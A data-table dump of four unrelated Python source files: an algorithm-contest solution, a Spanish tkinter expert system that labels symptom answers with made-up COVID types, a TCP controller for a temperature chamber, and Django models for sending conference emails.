text string | size int64 | token_count int64 |
|---|---|---|
from bisect import bisect_left, bisect_right
from collections import deque, Counter
from itertools import combinations, permutations
from math import gcd, sin, cos, tan, degrees, radians
import sys
input = lambda: sys.stdin.readline().rstrip()
MOD = 10 ** 9 + 7
INF = float("inf")
n, d, a = map(int, input().split())
monsters = [tuple(map(int, input().split())) for _ in range(n)]
monsters.sort()
now = 0
ans = 0
bomb = deque()
for m in monsters:
x = m[0]
attack_count = -(-m[1] // a)
while len(bomb) and bomb[0][0] < x:
b = bomb.popleft()
now -= b[1]
if attack_count > now:
ans += attack_count - now
bomb.append((x + 2 * d, attack_count - now))
now = attack_count
print(ans) | 738 | 269 |
from tkinter import*
from tkinter import font
from experta import *
raiz = Tk()
raiz.title("Sistema experto- Tipos de covid")
raiz.config(bg="#f4f7fa")
#raiz.resizable(0,0)
mi0Frame = Frame(raiz)#, width="1200", height="700")
mi0Frame.grid(row=1, column=0)
mi0Frame.config(bg="#f4f7fa")
mi3Frame = Frame(raiz)#, width="1200", height="700")
mi3Frame.grid(row=1, column=1)
mi3Frame.config(bg="#f4f7fa")
miFrame = Frame(raiz)#, width="1200", height="700")
miFrame.grid(row=2, column=0)
miFrame.config(bg="#f4f7fa")
mi2Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi2Frame.grid(row=2, column=1)
mi2Frame.config(bg="#f4f7fa")
mi4Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi4Frame.grid(row=0, column=0)
mi4Frame.config(bg="#f4f7fa")
reinicio = 0
#-----------------------------------------------INPUTS DE LOS SÍNTOMAS------------------------------------------------------------
sin0 = Label(miFrame, text="Dolor de cabeza:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin0.grid(row=0, column=0,padx=10, pady=10,sticky="e")
in_sin0 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin0.grid(row=0, column=1,padx=10, pady=10)
sin1 = Label(miFrame, text="Perdida del olfato:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin1.grid(row=1, column=0,padx=10, pady=10,sticky="e")
in_sin1 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin1.grid(row=1, column=1,padx=10, pady=10)
sin2 = Label(miFrame, text="Dolor muscular:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin2.grid(row=2, column=0,padx=10, pady=10,sticky="e")
in_sin2 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin2.grid(row=2, column=1,padx=10, pady=10)
sin3 = Label(miFrame, text="Tos:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin3.grid(row=3, column=0,padx=10, pady=10,sticky="e")
in_sin3 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin3.grid(row=3, column=1,padx=10, pady=10)
sin4 = Label(miFrame, text="Dolor de garganta:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin4.grid(row=4, column=0,padx=10, pady=10,sticky="e")
in_sin4 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin4.grid(row=4, column=1,padx=10, pady=10)
sin5 = Label(miFrame, text="Dolor en el pecho:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin5.grid(row=5, column=0,padx=10, pady=10,sticky="e")
in_sin5 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin5.grid(row=5, column=1,padx=10, pady=10)
sin6 = Label(miFrame, text="Fiebre:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin6.grid(row=6, column=0,padx=10, pady=10,sticky="e")
in_sin6 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin6.grid(row=6, column=1,padx=10, pady=10)
sin7 = Label(miFrame, text="Ronquera:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin7.grid(row=7, column=0,padx=10, pady=10,sticky="e")
in_sin7 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin7.grid(row=7, column=1,padx=10, pady=10)
sin8 = Label(miFrame, text="Pérdida del apetito:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin8.grid(row=8, column=0,padx=10, pady=10,sticky="e")
in_sin8 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin8.grid(row=8, column=1,padx=10, pady=10)
sin9 = Label(miFrame, text="Diarrea:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin9.grid(row=9, column=0,padx=10, pady=10,sticky="e")
in_sin9 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin9.grid(row=9, column=1,padx=10, pady=10)
sin10 = Label(miFrame, text="Fatiga:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin10.grid(row=10, column=0,padx=10, pady=10,sticky="e")
in_sin10 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin10.grid(row=10, column=1,padx=10, pady=10)
sin11 = Label(miFrame, text="Confusión:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin11.grid(row=11, column=0,padx=10, pady=10,sticky="e")
in_sin11 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin11.grid(row=11, column=1,padx=10, pady=10)
sin12 = Label(miFrame, text="Dificultad para respirar:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin12.grid(row=12, column=0,padx=10, pady=10,sticky="e")
in_sin12 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin12.grid(row=12, column=1,padx=10, pady=10)
#------Cuadros de los resultados--------
tipo_final_lbl = Label(mi2Frame, text="Tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
tipo_final_lbl.grid(row=2, column=0,padx=10, pady=10,sticky="n")
tipo_final = Entry(mi2Frame, width=35, justify='center', font=('FELIX TITLING', 10, font.BOLD))
tipo_final.grid(row=3, column=0, padx=1, pady=1)
blank = Label(mi2Frame, bg="#F0F8FF")
blank.grid(row=4, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo_lbl = Label(mi2Frame, text="Descripción del tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
descripcion_tipo_lbl.grid(row=5, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo = Text(mi2Frame, width=60, height=10)
descripcion_tipo.grid(row=6, column=0, padx=10, pady=10)
sugerencias_lbl = Label(mi2Frame, text="Sugerencias para tratar la enfermedad:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sugerencias_lbl.grid(row=7, column=0,padx=10, pady=10,sticky="n")
sugerencias = Text(mi2Frame, width=60, height=10)
sugerencias.grid(row=8, column=0, padx=10, pady=10)
#------HEADER--------
head1 = Label(mi0Frame, text="\nSÍNTOMAS", bg="#F0F8FF", font=('Elephant', 15))
head1.grid(row=0, column=0, sticky="n")
head1_0 = Label(mi3Frame, text="DIAGNÓSTICO", bg="#F0F8FF", font=('Elephant', 15))
head1_0.grid(row=0, column=0, sticky="n")
head1 = Label(mi0Frame, bg="#F0F8FF")
head1.grid(row=1, column=0, sticky="n")
head2 = Label(mi0Frame, text=" -Introduce un 'si' o un 'no' dependiendo de los síntomas que presentes",
bg="#F0F8FF", font=('Century Ghotic', 11))
head2.grid(row=2, column=0, sticky="n" )
head3 = Label(mi4Frame, text="Sistema experto - Tipos de COVID", bg="#F0F8FF", font=('Elephant', 15))
head3.grid(row=0)
#-----------------------------------------^^^^^^INPUTS DE LOS SÍNTOMAS^^^^^^------------------------------------------------------
lista_tipos = []
sintomas_tipo = []
map_sintomas = {}
d_desc_map = {}
d_tratamiento_map = {}
def preprocess():
global lista_tipos,sintomas_tipo,map_sintomas,d_desc_map,d_tratamiento_map
tipos = open("tipos.txt")
tipos_t = tipos.read()
lista_tipos = tipos_t.split("\n")
tipos.close()
for tipo in lista_tipos:
tipo_s_file = open("Sintomas tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
s_list = tipo_s_data.split("\n")
sintomas_tipo.append(s_list)
map_sintomas[str(s_list)] = tipo
tipo_s_file.close()
tipo_s_file = open("Descripcion tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
d_desc_map[tipo] = tipo_s_data
tipo_s_file.close()
tipo_s_file = open("Tratamientos tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
d_tratamiento_map[tipo] = tipo_s_data
tipo_s_file.close()
def identificar_tipo(*arguments):
lista_sintomas = []
for sintoma in arguments:
lista_sintomas.append(sintoma)
# Handle key error
return map_sintomas[str(lista_sintomas)]
def get_details(tipo):
return d_desc_map[tipo]
def get_tratamiento(tipo):
return d_tratamiento_map[tipo]
def no_coincide(tipo):
tipo_final.delete("1.0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
id_tipo = tipo
tipo_details = get_details(id_tipo)
tratamientos = get_tratamiento(id_tipo)
tipo_final.insert("1.0", id_tipo)
descripcion_tipo.insert("1.0", tipo_details)
sugerencias.insert("1.0", tratamientos)
#def identificar_tipo(dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera, perdida_apetito , diarrea, fatiga, confusión, dificultad_respiratoria):
class Covid(KnowledgeEngine):
@DefFacts()
def _initial_action(self):
yield Fact(action="encontrar_tipo")
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_cabeza=W())),salience = 1)
def sintoma_0(self):
self.declare(Fact(dolor_cabeza=in_sin0.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_olfato=W())),salience = 1)
def sintoma_1(self):
self.declare(Fact(perdida_olfato=in_sin1.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_muscular=W())),salience = 1)
def sintoma_2(self):
self.declare(Fact(dolor_muscular=in_sin2.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(tos=W())),salience = 1)
def sintoma_3(self):
self.declare(Fact(tos=in_sin3.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_garganta=W())),salience = 1)
def sintoma_4(self):
self.declare(Fact(dolor_garganta=in_sin4.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_pecho=W())),salience = 1)
def sintoma_5(self):
self.declare(Fact(dolor_pecho=in_sin5.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(fiebre=W())),salience = 1)
def sintoma_6(self):
self.declare(Fact(fiebre=in_sin6.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(ronquera=W())),salience = 1)
def sintoma_7(self):
self.declare(Fact(ronquera=in_sin7.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_apetito=W())),salience = 1)
def sintoma_8(self):
self.declare(Fact(perdida_apetito=in_sin8.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(diarrea=W())),salience = 1)
def sintoma_9(self):
self.declare(Fact(diarrea=in_sin9.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(fatiga=W())),salience = 1)
def sintoma_10(self):
self.declare(Fact(fatiga=in_sin10.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(confusion=W())),salience = 1)
def sintoma_11(self):
self.declare(Fact(confusion=in_sin11.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dificultad_respiratoria=W())),salience = 1)
def sintoma_12(self):
self.declare(Fact(dificultad_respiratoria=in_sin12.get()))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_0(self):
self.declare(Fact(tipo="Gripal sin fiebre"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="no"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_1(self):
self.declare(Fact(tipo="Gripal con fiebre"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="si"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_2(self):
self.declare(Fact(tipo="Gastro Intestinal"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="no"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_3(self):
self.declare(Fact(tipo="Nivel severo uno"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="no"))
def tipo_4(self):
self.declare(Fact(tipo="Nivel severo dos"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="si"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="si"))
def tipo_5(self):
self.declare(Fact(tipo="Nivel severo tres"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="no"),Fact(perdida_olfato="no"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="no"),Fact(dolor_pecho="no"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_6(self):
self.declare(Fact(tipo="No es covid"))
@Rule(Fact(action='encontrar_tipo'),Fact(tipo=MATCH.tipo),salience = -998)
def tipo(self, tipo):
tipo_final.delete("0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
id_tipo = tipo
tipo_details = get_details(id_tipo)
tratamientos = get_tratamiento(id_tipo)
tipo_final.insert("0", id_tipo)
descripcion_tipo.insert("1.0", tipo_details)
sugerencias.insert("1.0",tratamientos)
@Rule(Fact(action='encontrar_tipo'),
Fact(dolor_cabeza=MATCH.dolor_cabeza),
Fact(perdida_olfato=MATCH.perdida_olfato),
Fact(dolor_muscular=MATCH.dolor_muscular),
Fact(tos=MATCH.tos),
Fact(dolor_garganta=MATCH.dolor_garganta),
Fact(dolor_pecho=MATCH.dolor_pecho),
Fact(fiebre=MATCH.fiebre),
Fact(ronquera=MATCH.ronquera),
Fact(perdida_apetito=MATCH.perdida_apetito),
Fact(diarrea=MATCH.diarrea),
Fact(fatiga=MATCH.fatiga),
Fact(confusion=MATCH.confusion),
Fact(dificultad_respiratoria=MATCH.dificultad_respiratoria),NOT(Fact(tipo=MATCH.tipo)),salience = -999)
def not_matched(self,dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera,perdida_apetito ,diarrea ,fatiga ,confusion ,dificultad_respiratoria):
global reinicio
if reinicio == 0:
tipo_final.delete("0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
tipo_final.insert("0", "Sin coincidencia")
descripcion_tipo.insert("1.0", "No se encontró un tipo de covid que se relacione con los síntomas presentados")
sugerencias.insert("1.0", "Se sugiere consultar a un médico que le ayude a descubrir su tipo de enfermedad")
else:
reinicio = 0
def iniciar_sistema():
if __name__ == "__main__":
preprocess()
engine = Covid()
engine.reset()
engine.run()
def reiniciar():
global reinicio
reinicio = 1
in_sin0.delete("0", END)
in_sin1.delete("0", END)
in_sin2.delete("0", END)
in_sin3.delete("0", END)
in_sin4.delete("0", END)
in_sin5.delete("0", END)
in_sin6.delete("0", END)
in_sin7.delete("0", END)
in_sin8.delete("0", END)
in_sin9.delete("0", END)
in_sin10.delete("0", END)
in_sin11.delete("0", END)
in_sin12.delete("0", END)
tipo_final.delete("0", END)
descripcion_tipo.delete('1.0', END)
sugerencias.delete('1.0', END)
preprocess()
engine = Covid()
engine.reset()
engine.run()
def salir():
exit()
#------------------BOTONES---------------------------------------
generarTabla = Button(
miFrame,
text="RESULTADO",
command=iniciar_sistema,
bg="#7fd1ff",
font=("Eurostile", 10, font.BOLD),
padx=20,
pady=5
)
generarTabla.grid(row=13, column=1, padx=10, pady=15)
reiniciar = Button(
mi2Frame, text="REINICIAR",
command=reiniciar,
bg="#7fd1ff",
font=("Eurostile", 10, font.BOLD),
padx=20,
pady=5
)
reiniciar.grid(row=9, column=0, padx=10, pady=15)
salir = Button(
mi2Frame, text="SALIR",
command=salir,
bg="#ea9999",
font=("Eurostile", 9),
border='2p',
padx=20,
pady=3
)
salir.grid(row=10, column=0, padx=10, pady=15)
raiz.mainloop() | 16,532 | 7,413 |
import socket
import time
import shelve
preset_command = {
1: ['MB0023,1', 'MI0695,'],
2: ['MB0024,1', 'MI0696,'],
3: ['MB0076,1', 'MI0697,'],
4: ['MB0026,1', 'MI0698,'],
}
force_command = 'MB0336,1'
start_command = 'MB0020,0'
stop_command = 'MB0020,1'
class Temperature:
def __init__(self):
# 是否打印log信息
self.is_info = False
# 打印log信息
self.info = ''
# temp测试任务
self.task = []
# 打开配置文件
self.init_temp = shelve.open('init/init_temp')
self.ip = self.init_temp['temp_ip']
self.channel1_temp = self.init_temp['temp_channel1_temp']
self.channel2_temp = self.init_temp['temp_channel2_temp']
self.channel3_temp = self.init_temp['temp_channel3_temp']
self.channel4_temp = self.init_temp['temp_channel4_temp']
self.is_channel1_temp = self.init_temp['temp_is_channel1_temp']
self.is_channel2_temp = self.init_temp['temp_is_channel2_temp']
self.is_channel3_temp = self.init_temp['temp_is_channel3_temp']
self.is_channel4_temp = self.init_temp['temp_is_channel4_temp']
# 关闭配置文件
self.init_temp.close()
self.channel1 = (self.channel1_temp, 1)
self.channel2 = (self.channel2_temp, 2)
self.channel3 = (self.channel3_temp, 3)
self.channel4 = (self.channel4_temp, 4)
# 创造套接字
self.server = socket.socket()
# self.ip = '192.168.0.14'
self.port = 5000
try:
self.server.connect((self.ip, self.port))
# print('[INFO-TEMP]connect successfully')
self.send_info('[INFO-TEMP]connect successfully')
time.sleep(1)
except:
# print('[FAIL-TEMP]connect fail')
self.send_info('[FAIL-TEMP]connect fail')
# 向设备发送数据
def send(self, data):
try:
self.server.send(bytes(data, encoding='ASCII'))
except ConnectionError:
# print('[FAIL-TEMP]send data fail')
self.send_info('[FAIL-TEMP]send data fail')
# 向设备接受数据
def recv(self):
try:
text = str(self.server.recv(1024), encoding='UTF-8')
# print(text)
except ConnectionError:
# print('[FAIL-TEMP]receive error')
self.send_info('[FAIL-TEMP]receive error')
text = ',9990'
return text
# 指令 (发送指令)
def command(self, command):
self.send('m')
time.sleep(1)
self.send(command)
time.sleep(1)
# 写入指令 (无返回值)
def write_command(self, command):
self.command(command)
self.ack()
# 询问指令 (有返回值)
def query_command(self, command):
self.command(command)
return self.recv()
# 设备应答
def ack(self):
while True:
if self.recv() == 'OK':
break
# 温度预设 (四个通道)
def preset(self, channel):
temp = int(channel[0])
temp_command = ''
if temp == 0:
temp_command = '0000'
elif (temp > 0) and (temp < 10):
temp_command = '00' + str(temp) + '0'
elif (temp > 9) and (temp < 100):
temp_command = '0' + str(temp) + '0'
elif temp > 99:
temp_command = str(temp) + '0'
elif (temp < 0) and (temp > -10):
temp_command = '0' + str(temp) + '0'
elif temp < -9:
temp_command = '' + str(temp) + '0'
elif temp >= 175:
temp_command = '1750'
elif temp <= -75:
temp_command = '-750'
channel_command = preset_command[channel[1]][1]
command = channel_command + temp_command
self.write_command(command)
# print('[INFO-TEMP]channel%s, %s℃ set successfully!' % (channel[1], channel[0]))
self.send_info('[INFO-TEMP]channel' + str(channel[1]) + ', ' + str(channel[0]) +'℃ set successfully!')
# 选择温度预设为当前值
def change_channel(self, channel):
state_command = preset_command[channel[1]][0]
self.write_command(state_command)
# print('[INFO-TEMP]change channel:', channel[1])
self.send_info('[INFO-TEMP]change channel ' + str(channel[1]) + " " + str(channel[0]) + '℃')
# 将测试项添加到任务列表中
def task_generate(self):
if self.is_channel1_temp:
self.preset((self.channel1_temp, 1))
self.task.append(self.channel1)
if self.is_channel2_temp:
self.preset((self.channel2_temp, 2))
self.task.append(self.channel2)
if self.is_channel3_temp:
self.preset((self.channel3_temp, 3))
self.task.append(self.channel3)
if self.is_channel4_temp:
self.preset((self.channel4_temp, 4))
self.task.append(self.channel4)
self.write_command(force_command)
# print('[INFO-TEMP]force on')
self.send_info('[INFO-TEMP]force on')
# 检查设备温度 (1秒询问一次)
def check_temp(self, channel):
while True:
for i in range(3):
text = self.query_command('MI0006?') # 获取格式为 MI6,250
temp1 = int(text.split(',')[1]) # 250 整数位+小数位
# print('[INFO-TEMP]temp: ', temp1 / 10.0, '℃')
self.send_info('[INFO-TEMP]temp: ' + str(temp1 / 10.0) + '℃')
temp = int(channel[0])
if (temp1 == temp * 10) and (i == 2):
return
elif temp1 == temp * 10:
pass
else:
break
# 启动设备
def start(self):
self.write_command(start_command)
# print('[INFO-TEMP]running!')
self.send_info('[INFO-TEMP]running!')
# 关闭设备
def stop(self):
self.write_command(stop_command)
# print('[INFO-TEMP]close!')
self.send_info('[INFO-TEMP]close!')
# 用于切换不同task
def run(self, task):
self.change_channel(task)
self.check_temp(task)
time.sleep(1)
# 向主线程发送数据
def send_info(self, info):
self.info = info
self.is_info = True
if __name__ == '__main__':
temperature = Temperature()
| 6,105 | 2,293 |
from django.conf import settings
from django.core.mail import send_mail
from django.db import models
from django.db.models import ForeignKey, OneToOneField, TextField, CharField, \
SET_NULL, CASCADE, BooleanField, UniqueConstraint
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template import Template, Context
from django.utils import timezone
from markdown import markdown
from html2text import html2text
from chair_mail.context import get_conference_context, get_user_context, \
get_submission_context, get_frame_context
from conferences.models import Conference
from submissions.models import Submission
from users.models import User
MSG_TYPE_USER = 'user'
MSG_TYPE_SUBMISSION = 'submission'
MESSAGE_TYPE_CHOICES = (
(MSG_TYPE_USER, 'Message to users'),
(MSG_TYPE_SUBMISSION, 'Message to submissions'),
)
class EmailFrame(models.Model):
text_html = models.TextField()
text_plain = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now_add=True)
created_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
conference = models.ForeignKey(Conference, on_delete=models.CASCADE)
@staticmethod
def render(frame_template, conference, subject, body):
context_data = get_frame_context(conference, subject, body)
context = Context(context_data, autoescape=False)
return Template(frame_template).render(context)
def render_html(self, subject, body):
return EmailFrame.render(
self.text_html, self.conference, subject, body
)
def render_plain(self, subject, body):
text_plain = self.text_plain
if not text_plain:
text_plain = html2text(self.text_html)
return EmailFrame.render(
text_plain, self.conference, subject, body
)
class EmailSettings(models.Model):
frame = models.ForeignKey(EmailFrame, on_delete=models.SET_NULL, null=True)
conference = models.OneToOneField(
Conference, null=True, blank=True, on_delete=models.CASCADE,
related_name='email_settings',
)
class GroupMessage(models.Model):
subject = models.CharField(max_length=1024)
body = models.TextField()
conference = models.ForeignKey(
Conference,
on_delete=models.CASCADE,
related_name='sent_group_emails',
)
sent_at = models.DateTimeField(auto_now_add=True)
sent_by = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True,
related_name='sent_group_emails'
)
sent = models.BooleanField(default=False)
@property
def message_type(self):
return ''
class UserMessage(GroupMessage):
recipients = models.ManyToManyField(User, related_name='group_emails')
group_message = models.OneToOneField(
GroupMessage, on_delete=models.CASCADE, parent_link=True)
@property
def message_type(self):
return MSG_TYPE_USER
@staticmethod
def create(subject, body, conference, objects_to):
msg = UserMessage.objects.create(
subject=subject, body=body, conference=conference)
for user in objects_to:
msg.recipients.add(user)
msg.save()
return msg
def send(self, sender):
# 1) Update status and save sender chair user:
self.sent = False
self.sent_by = sender
self.save()
# 2) For each user, we render this template with the given context,
# and then build the whole message by inserting this body into
# the frame. Plain-text version is also formed from HTML.
frame = self.conference.email_settings.frame
conference_context = get_conference_context(self.conference)
for user in self.recipients.all():
context = Context({
**conference_context,
**get_user_context(user, self.conference)
}, autoescape=False)
email = EmailMessage.create(
group_message=self.group_message,
user_to=user,
context=context,
frame=frame
)
email.send(sender)
# 3) Update self status, write sending timestamp
self.sent_at = timezone.now()
self.sent = True
self.save()
return self
class SubmissionMessage(GroupMessage):
recipients = models.ManyToManyField(
Submission, related_name='group_emails')
group_message = models.OneToOneField(
GroupMessage, on_delete=models.CASCADE, parent_link=True)
@property
def message_type(self):
return MSG_TYPE_SUBMISSION
@staticmethod
def create(subject, body, conference, objects_to):
msg = SubmissionMessage.objects.create(
subject=subject, body=body, conference=conference)
for submission in objects_to:
msg.recipients.add(submission)
msg.save()
return msg
def send(self, sender):
# 1) Update status and save sender chair user:
self.sent = False
self.sent_by = sender
self.save()
# 2) For each user, we render this template with the given context,
# and then build the whole message by inserting this body into
# the frame. Plain-text version is also formed from HTML.
frame = self.conference.email_settings.frame
conference_context = get_conference_context(self.conference)
for submission in self.recipients.all():
submission_context = get_submission_context(submission)
for author in submission.authors.all():
user = author.user
context = Context({
**conference_context,
**submission_context,
**get_user_context(user, self.conference)
}, autoescape=False)
email = EmailMessage.create(
group_message=self.group_message,
user_to=user,
context=context,
frame=frame
)
email.send(sender)
# 3) Update self status, write sending timestamp
self.sent_at = timezone.now()
self.sent = True
self.save()
return self
def get_group_message_model(msg_type):
return {
MSG_TYPE_USER: UserMessage,
MSG_TYPE_SUBMISSION: SubmissionMessage,
}[msg_type]
def get_message_leaf_model(msg):
"""If provided a `GroupMessage` instance, check the inheritance, find
the most descent child and return it. Now the possible leaf models are
`UserMessage` and `SubmissionMessage`."""
if hasattr(msg, 'usermessage'):
return msg.usermessage
elif hasattr(msg, 'submissionmessage'):
return msg.submissionmessage
# Also check, maybe a message is already a leaf:
if isinstance(msg, UserMessage) or isinstance(msg, SubmissionMessage):
return msg
# If neither succeeded, raise an error:
raise TypeError(f'Not a group message: type(msg)')
class EmailMessage(models.Model):
subject = models.TextField(max_length=1024)
text_plain = models.TextField()
text_html = models.TextField()
user_to = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='emails'
)
sent_at = models.DateTimeField(auto_now_add=True)
sent = models.BooleanField(default=False)
sent_by = models.ForeignKey(
User,
on_delete=models.SET_NULL, null=True,
related_name='sent_emails'
)
group_message = models.ForeignKey(
GroupMessage,
on_delete=models.SET_NULL,
null=True,
related_name='messages',
)
@staticmethod
def create(group_message, user_to, context, frame):
template_body = Template(group_message.body)
template_subject = Template(group_message.subject)
body_md = template_body.render(context)
body_html = markdown(body_md)
subject = template_subject.render(context)
return EmailMessage.objects.create(
user_to=user_to,
group_message=group_message,
subject=subject,
text_html=frame.render_html(subject, body_html),
text_plain=frame.render_plain(subject, body_md),
)
def send(self, sender):
if not self.sent:
from_email = settings.DEFAULT_FROM_EMAIL
send_mail(self.subject, self.text_plain, from_email, [self.user_to],
html_message=self.text_html)
self.sent_at = timezone.now()
self.sent_by = sender
self.sent = True
self.save()
return self
class SystemNotification(models.Model):
"""This model represents a system notification fired on a specific event.
The model itself doesn't define the circumstances in which the message
must be sent, which are subject to views.
Notification is defined with a mandatory name, optional description,
subject and template. If template is not assigned or subject is not
specified, messages won't be sent.
Notification can also be turned off with `is_active` flag field.
"""
ASSIGN_STATUS_SUBMIT = 'assign_status_submit'
ASSIGN_STATUS_REVIEW = 'assign_status_review'
ASSIGN_STATUS_ACCEPT = 'assign_status_accept'
ASSIGN_STATUS_REJECT = 'assign_status_reject'
ASSIGN_STATUS_INPRINT = 'assign_status_inprint'
ASSIGN_STATUS_PUBLISHED = 'assign_status_publish'
NAME_CHOICES = (
(ASSIGN_STATUS_REVIEW, 'Assign status REVIEW to the paper'),
(ASSIGN_STATUS_SUBMIT, 'Assign status SUBMIT to the paper'),
(ASSIGN_STATUS_ACCEPT, 'Assign status ACCEPT to the paper'),
(ASSIGN_STATUS_REJECT, 'Assign status REJECT to the paper'),
(ASSIGN_STATUS_INPRINT, 'Assign status IN-PRINT to the paper'),
(ASSIGN_STATUS_PUBLISHED, 'Assign status PUBLISHED to the paper'),
)
name = CharField(max_length=64, choices=NAME_CHOICES)
subject = CharField(max_length=1024, blank=True)
is_active = BooleanField(default=False)
type = CharField(max_length=64, choices=MESSAGE_TYPE_CHOICES, blank=False)
body = TextField(blank=True)
